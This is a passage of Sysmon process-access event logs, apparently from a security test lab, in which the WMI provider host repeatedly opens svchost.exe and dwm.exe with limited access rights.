{A837DB8D-01B5-5F25-0000-0010E7C30000}\r\nTargetProcessId: 1220\r\nTargetImage: C:\\Windows\\System32\\svchost.exe\r\nGrantedAccess: 0x1410\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\system32\\wbem\\cimwin32.dll+6fb3|C:\\Windows\\system32\\wbem\\cimwin32.dll+7471|C:\\Windows\\SYSTEM32\\framedynos.dll+5899|C:\\Windows\\SYSTEM32\\framedynos.dll+adc4|C:\\Windows\\system32\\wbem\\wmiprvse.exe+a731|C:\\Windows\\system32\\wbem\\wmiprvse.exe+a344|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\combase.dll+1370|C:\\Windows\\System32\\RPCRT4.dll+b41b|C:\\Windows\\System32\\combase.dll+4f3ec|C:\\Windows\\System32\\combase.dll+4f0a2|C:\\Windows\\System32\\combase.dll+4df28|C:\\Windows\\System32\\combase.dll+4c4bd|C:\\Windows\\System32\\combase.dll+4bb9f|C:\\Windows\\System32\\combase.dll+65859|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5973e|C:\\Windows\\System32\\RPCRT4.dll+39167|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:48.703","SourceProcessGUID":"{A837DB8D-0330-5F25-0000-0010E0BB0A00}","SourceProcessId":"1256","SourceThreadId":"756","SourceImage":"C:\\Windows\\system32\\wbem\\wmiprvse.exe","TargetProcessGUID":"{A837DB8D-01B5-5F25-0000-0010E7C30000}","TargetProcessId":"1220","TargetImage":"C:\\Windows\\System32\\svchost.exe","GrantedAccess":"0x1410","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\system32\\wbem\\cimwin32.dll+6fb3|C:\\Windows\\system32\\wbem\\cimwin32.dll+7471|C:\\Windows\\SYSTEM32\\framedynos.dll+5899|C:\\Windows\\SYSTEM32\\framedynos.dll+adc4|C:\\Windows\\system32\\wbem\\wmiprvse.exe+a731|C:\\Windows\\system32\\wbem\\wmiprvse.exe+a344|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\combase.dll+1370|C:\\Windows\\System32\\RPCRT4.dll+b41b|C:\\Windows\\System32\\combase.dll+4f3ec|C:\\Windows\\System32\\combase.dll+4f0a2|C:\\Windows\\System32\\combase.dll+4df28|C:\\Windows\\System32\\combase.dll+4c4bd|C:\\Windows\\System32\\combase.dll+4bb9f|C:\\Windows\\System32\\combase.dll+65859|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5973e|C:\\Windows\\System32\\RPCRT4.dll+39167|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac","EventReceivedTime":"2020-08-01 05:52:49","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:48","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5620,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:48.703\r\nSourceProcessGUID: {A837DB8D-0330-5F25-0000-0010E0BB0A00}\r\nSourceProcessId: 1256\r\nSourceThreadId: 756\r\nSourceImage: C:\\Windows\\system32\\wbem\\wmiprvse.exe\r\nTargetProcessGUID: {A837DB8D-01B5-5F25-0000-0010EDC30000}\r\nTargetProcessId: 1224\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1410\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\system32\\wbem\\cimwin32.dll+6fb3|C:\\Windows\\system32\\wbem\\cimwin32.dll+7471|C:\\Windows\\SYSTEM32\\framedynos.dll+5899|C:\\Windows\\SYSTEM32\\framedynos.dll+adc4|C:\\Windows\\system32\\wbem\\wmiprvse.exe+a731|C:\\Windows\\system32\\wbem\\wmiprvse.exe+a344|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\combase.dll+1370|C:\\Windows\\System32\\RPCRT4.dll+b41b|C:\\Windows\\System32\\combase.dll+4f3ec|C:\\Windows\\System32\\combase.dll+4f0a2|C:\\Windows\\System32\\combase.dll+4df28|C:\\Windows\\System32\\combase.dll+4c4bd|C:\\Windows\\System32\\combase.dll+4bb9f|C:\\Windows\\System32\\combase.dll+65859|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5973e|C:\\Windows\\System32\\RPCRT4.dll+39167|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:48.703","SourceProcessGUID":"{A837DB8D-0330-5F25-0000-0010E0BB0A00}","SourceProcessId":"1256","SourceThreadId":"756","SourceImage":"C:\\Windows\\system32\\wbem\\wmiprvse.exe","TargetProcessGUID":"{A837DB8D-01B5-5F25-0000-0010EDC30000}","TargetProcessId":"1224","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1410","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\system32\\wbem\\cimwin32.dll+6fb3|C:\\Windows\\system32\\wbem\\cimwin32.dll+7471|C:\\Windows\\SYSTEM32\\framedynos.dll+5899|C:\\Windows\\SYSTEM32\\framedynos.dll+adc4|C:\\Windows\\system32\\wbem\\wmiprvse.exe+a731|C:\\Windows\\system32\\wbem\\wmiprvse.exe+a344|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\combase.dll+1370|C:\\Windows\\System32\\RPCRT4.dll+b41b|C:\\Windows\\System32\\combase.dll+4f3ec|C:\\Windows\\System32\\combase.dll+4f0a2|C:\\Windows\\System32\\combase.dll+4df28|C:\\Windows\\System32\\combase.dll+4c4bd|C:\\Windows\\System32\\combase.dll+4bb9f|C:\\Windows\\System32\\combase.dll+65859|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5973e|C:\\Windows\\System32\\RPCRT4.dll+39167|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac","EventReceivedTime":"2020-08-01 05:52:49","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:48","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5621,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:48.703\r\nSourceProcessGUID: {A837DB8D-0330-5F25-0000-0010E0BB0A00}\r\nSourceProcessId: 1256\r\nSourceThreadId: 756\r\nSourceImage: C:\\Windows\\system32\\wbem\\wmiprvse.exe\r\nTargetProcessGUID: {A837DB8D-01B5-5F25-0000-0010D4CB0000}\r\nTargetProcessId: 1308\r\nTargetImage: C:\\Windows\\System32\\svchost.exe\r\nGrantedAccess: 0x1410\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\system32\\wbem\\cimwin32.dll+6fb3|C:\\Windows\\system32\\wbem\\cimwin32.dll+7471|C:\\Windows\\SYSTEM32\\framedynos.dll+5899|C:\\Windows\\SYSTEM32\\framedynos.dll+adc4|C:\\Windows\\system32\\wbem\\wmiprvse.exe+a731|C:\\Windows\\system32\\wbem\\wmiprvse.exe+a344|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\combase.dll+1370|C:\\Windows\\System32\\RPCRT4.dll+b41b|C:\\Windows\\System32\\combase.dll+4f3ec|C:\\Windows\\System32\\combase.dll+4f0a2|C:\\Windows\\System32\\combase.dll+4df28|C:\\Windows\\System32\\combase.dll+4c4bd|C:\\Windows\\System32\\combase.dll+4bb9f|C:\\Windows\\System32\\combase.dll+65859|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5973e|C:\\Windows\\System32\\RPCRT4.dll+39167|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:48.703","SourceProcessGUID":"{A837DB8D-0330-5F25-0000-0010E0BB0A00}","SourceProcessId":"1256","SourceThreadId":"756","SourceImage":"C:\\Windows\\system32\\wbem\\wmiprvse.exe","TargetProcessGUID":"{A837DB8D-01B5-5F25-0000-0010D4CB0000}","TargetProcessId":"1308","TargetImage":"C:\\Windows\\System32\\svchost.exe","GrantedAccess":"0x1410","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\system32\\wbem\\cimwin32.dll+6fb3|C:\\Windows\\system32\\wbem\\cimwin32.dll+7471|C:\\Windows\\SYSTEM32\\framedynos.dll+5899|C:\\Windows\\SYSTEM32\\framedynos.dll+adc4|C:\\Windows\\system32\\wbem\\wmiprvse.exe+a731|C:\\Windows\\system32\\wbem\\wmiprvse.exe+a344|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\combase.dll+1370|C:\\Windows\\System32\\RPCRT4.dll+b41b|C:\\Windows\\System32\\combase.dll+4f3ec|C:\\Windows\\System32\\combase.dll+4f0a2|C:\\Windows\\System32\\combase.dll+4df28|C:\\Windows\\System32\\combase.dll+4c4bd|C:\\Windows\\System32\\combase.dll+4bb9f|C:\\Windows\\System32\\combase.dll+65859|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5973e|C:\\Windows\\System32\\RPCRT4.dll+39167|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac","EventReceivedTime":"2020-08-01 05:52:49","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:48","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5622,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:48.703\r\nSourceProcessGUID: {A837DB8D-0330-5F25-0000-0010E0BB0A00}\r\nSourceProcessId: 1256\r\nSourceThreadId: 756\r\nSourceImage: C:\\Windows\\system32\\wbem\\wmiprvse.exe\r\nTargetProcessGUID: {A837DB8D-01B5-5F25-0000-0010FACE0000}\r\nTargetProcessId: 1332\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1410\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\system32\\wbem\\cimwin32.dll+6fb3|C:\\Windows\\system32\\wbem\\cimwin32.dll+7471|C:\\Windows\\SYSTEM32\\framedynos.dll+5899|C:\\Windows\\SYSTEM32\\framedynos.dll+adc4|C:\\Windows\\system32\\wbem\\wmiprvse.exe+a731|C:\\Windows\\system32\\wbem\\wmiprvse.exe+a344|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\combase.dll+1370|C:\\Windows\\System32\\RPCRT4.dll+b41b|C:\\Windows\\System32\\combase.dll+4f3ec|C:\\Windows\\System32\\combase.dll+4f0a2|C:\\Windows\\System32\\combase.dll+4df28|C:\\Windows\\System32\\combase.dll+4c4bd|C:\\Windows\\System32\\combase.dll+4bb9f|C:\\Windows\\System32\\combase.dll+65859|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5973e|C:\\Windows\\System32\\RPCRT4.dll+39167|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:48.703","SourceProcessGUID":"{A837DB8D-0330-5F25-0000-0010E0BB0A00}","SourceProcessId":"1256","SourceThreadId":"756","SourceImage":"C:\\Windows\\system32\\wbem\\wmiprvse.exe","TargetProcessGUID":"{A837DB8D-01B5-5F25-0000-0010FACE0000}","TargetProcessId":"1332","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1410","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\system32\\wbem\\cimwin32.dll+6fb3|C:\\Windows\\system32\\wbem\\cimwin32.dll+7471|C:\\Windows\\SYSTEM32\\framedynos.dll+5899|C:\\Windows\\SYSTEM32\\framedynos.dll+adc4|C:\\Windows\\system32\\wbem\\wmiprvse.exe+a731|C:\\Windows\\system32\\wbem\\wmiprvse.exe+a344|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\combase.dll+1370|C:\\Windows\\System32\\RPCRT4.dll+b41b|C:\\Windows\\System32\\combase.dll+4f3ec|C:\\Windows\\System32\\combase.dll+4f0a2|C:\\Windows\\System32\\combase.dll+4df28|C:\\Windows\\System32\\combase.dll+4c4bd|C:\\Windows\\System32\\combase.dll+4bb9f|C:\\Windows\\System32\\combase.dll+65859|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5973e|C:\\Windows\\System32\\RPCRT4.dll+39167|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac","EventReceivedTime":"2020-08-01 05:52:49","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:48","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5623,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:48.703\r\nSourceProcessGUID: {A837DB8D-0330-5F25-0000-0010E0BB0A00}\r\nSourceProcessId: 1256\r\nSourceThreadId: 756\r\nSourceImage: C:\\Windows\\system32\\wbem\\wmiprvse.exe\r\nTargetProcessGUID: {A837DB8D-01B5-5F25-0000-00105AD40000}\r\nTargetProcessId: 1376\r\nTargetImage: C:\\Windows\\system32\\dwm.exe\r\nGrantedAccess: 0x1410\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\system32\\wbem\\cimwin32.dll+6fb3|C:\\Windows\\system32\\wbem\\cimwin32.dll+7471|C:\\Windows\\SYSTEM32\\framedynos.dll+5899|C:\\Windows\\SYSTEM32\\framedynos.dll+adc4|C:\\Windows\\system32\\wbem\\wmiprvse.exe+a731|C:\\Windows\\system32\\wbem\\wmiprvse.exe+a344|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\combase.dll+1370|C:\\Windows\\System32\\RPCRT4.dll+b41b|C:\\Windows\\System32\\combase.dll+4f3ec|C:\\Windows\\System32\\combase.dll+4f0a2|C:\\Windows\\System32\\combase.dll+4df28|C:\\Windows\\System32\\combase.dll+4c4bd|C:\\Windows\\System32\\combase.dll+4bb9f|C:\\Windows\\System32\\combase.dll+65859|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5973e|C:\\Windows\\System32\\RPCRT4.dll+39167|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:48.703","SourceProcessGUID":"{A837DB8D-0330-5F25-0000-0010E0BB0A00}","SourceProcessId":"1256","SourceThreadId":"756","SourceImage":"C:\\Windows\\system32\\wbem\\wmiprvse.exe","TargetProcessGUID":"{A837DB8D-01B5-5F25-0000-00105AD40000}","TargetProcessId":"1376","TargetImage":"C:\\Windows\\system32\\dwm.exe","GrantedAccess":"0x1410","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\system32\\wbem\\cimwin32.dll+6fb3|C:\\Windows\\system32\\wbem\\cimwin32.dll+7471|C:\\Windows\\SYSTEM32\\framedynos.dll+5899|C:\\Windows\\SYSTEM32\\framedynos.dll+adc4|C:\\Windows\\system32\\wbem\\wmiprvse.exe+a731|C:\\Windows\\system32\\wbem\\wmiprvse.exe+a344|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\combase.dll+1370|C:\\Windows\\System32\\RPCRT4.dll+b41b|C:\\Windows\\System32\\combase.dll+4f3ec|C:\\Windows\\System32\\combase.dll+4f0a2|C:\\Windows\\System32\\combase.dll+4df28|C:\\Windows\\System32\\combase.dll+4c4bd|C:\\Windows\\System32\\combase.dll+4bb9f|C:\\Windows\\System32\\combase.dll+65859|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5973e|C:\\Windows\\System32\\RPCRT4.dll+39167|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac","EventReceivedTime":"2020-08-01 05:52:49","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:48","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5624,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:48.703\r\nSourceProcessGUID: {A837DB8D-0330-5F25-0000-0010E0BB0A00}\r\nSourceProcessId: 1256\r\nSourceThreadId: 756\r\nSourceImage: C:\\Windows\\system32\\wbem\\wmiprvse.exe\r\nTargetProcessGUID: {A837DB8D-01B5-5F25-0000-0010A4F00000}\r\nTargetProcessId: 1592\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1410\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\system32\\wbem\\cimwin32.dll+6fb3|C:\\Windows\\system32\\wbem\\cimwin32.dll+7471|C:\\Windows\\SYSTEM32\\framedynos.dll+5899|C:\\Windows\\SYSTEM32\\framedynos.dll+adc4|C:\\Windows\\system32\\wbem\\wmiprvse.exe+a731|C:\\Windows\\system32\\wbem\\wmiprvse.exe+a344|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\combase.dll+1370|C:\\Windows\\System32\\RPCRT4.dll+b41b|C:\\Windows\\System32\\combase.dll+4f3ec|C:\\Windows\\System32\\combase.dll+4f0a2|C:\\Windows\\System32\\combase.dll+4df28|C:\\Windows\\System32\\combase.dll+4c4bd|C:\\Windows\\System32\\combase.dll+4bb9f|C:\\Windows\\System32\\combase.dll+65859|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5973e|C:\\Windows\\System32\\RPCRT4.dll+39167|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:48.703","SourceProcessGUID":"{A837DB8D-0330-5F25-0000-0010E0BB0A00}","SourceProcessId":"1256","SourceThreadId":"756","SourceImage":"C:\\Windows\\system32\\wbem\\wmiprvse.exe","TargetProcessGUID":"{A837DB8D-01B5-5F25-0000-0010A4F00000}","TargetProcessId":"1592","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1410","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\system32\\wbem\\cimwin32.dll+6fb3|C:\\Windows\\system32\\wbem\\cimwin32.dll+7471|C:\\Windows\\SYSTEM32\\framedynos.dll+5899|C:\\Windows\\SYSTEM32\\framedynos.dll+adc4|C:\\Windows\\system32\\wbem\\wmiprvse.exe+a731|C:\\Windows\\system32\\wbem\\wmiprvse.exe+a344|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\combase.dll+1370|C:\\Windows\\System32\\RPCRT4.dll+b41b|C:\\Windows\\System32\\combase.dll+4f3ec|C:\\Windows\\System32\\combase.dll+4f0a2|C:\\Windows\\System32\\combase.dll+4df28|C:\\Windows\\System32\\combase.dll+4c4bd|C:\\Windows\\System32\\combase.dll+4bb9f|C:\\Windows\\System32\\combase.dll+65859|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5973e|C:\\Windows\\System32\\RPCRT4.dll+39167|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac","EventReceivedTime":"2020-08-01 05:52:49","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:48","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5625,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:48.703\r\nSourceProcessGUID: {A837DB8D-0330-5F25-0000-0010E0BB0A00}\r\nSourceProcessId: 1256\r\nSourceThreadId: 756\r\nSourceImage: C:\\Windows\\system32\\wbem\\wmiprvse.exe\r\nTargetProcessGUID: {A837DB8D-01B5-5F25-0000-001058000100}\r\nTargetProcessId: 1840\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1410\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\system32\\wbem\\cimwin32.dll+6fb3|C:\\Windows\\system32\\wbem\\cimwin32.dll+7471|C:\\Windows\\SYSTEM32\\framedynos.dll+5899|C:\\Windows\\SYSTEM32\\framedynos.dll+adc4|C:\\Windows\\system32\\wbem\\wmiprvse.exe+a731|C:\\Windows\\system32\\wbem\\wmiprvse.exe+a344|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\combase.dll+1370|C:\\Windows\\System32\\RPCRT4.dll+b41b|C:\\Windows\\System32\\combase.dll+4f3ec|C:\\Windows\\System32\\combase.dll+4f0a2|C:\\Windows\\System32\\combase.dll+4df28|C:\\Windows\\System32\\combase.dll+4c4bd|C:\\Windows\\System32\\combase.dll+4bb9f|C:\\Windows\\System32\\combase.dll+65859|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5973e|C:\\Windows\\System32\\RPCRT4.dll+39167|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:48.703","SourceProcessGUID":"{A837DB8D-0330-5F25-0000-0010E0BB0A00}","SourceProcessId":"1256","SourceThreadId":"756","SourceImage":"C:\\Windows\\system32\\wbem\\wmiprvse.exe","TargetProcessGUID":"{A837DB8D-01B5-5F25-0000-001058000100}","TargetProcessId":"1840","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1410","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\system32\\wbem\\cimwin32.dll+6fb3|C:\\Windows\\system32\\wbem\\cimwin32.dll+7471|C:\\Windows\\SYSTEM32\\framedynos.dll+5899|C:\\Windows\\SYSTEM32\\framedynos.dll+adc4|C:\\Windows\\system32\\wbem\\wmiprvse.exe+a731|C:\\Windows\\system32\\wbem\\wmiprvse.exe+a344|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\combase.dll+1370|C:\\Windows\\System32\\RPCRT4.dll+b41b|C:\\Windows\\System32\\combase.dll+4f3ec|C:\\Windows\\System32\\combase.dll+4f0a2|C:\\Windows\\System32\\combase.dll+4df28|C:\\Windows\\System32\\combase.dll+4c4bd|C:\\Windows\\System32\\combase.dll+4bb9f|C:\\Windows\\System32\\combase.dll+65859|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5973e|C:\\Windows\\System32\\RPCRT4.dll+39167|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac","EventReceivedTime":"2020-08-01 05:52:49","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
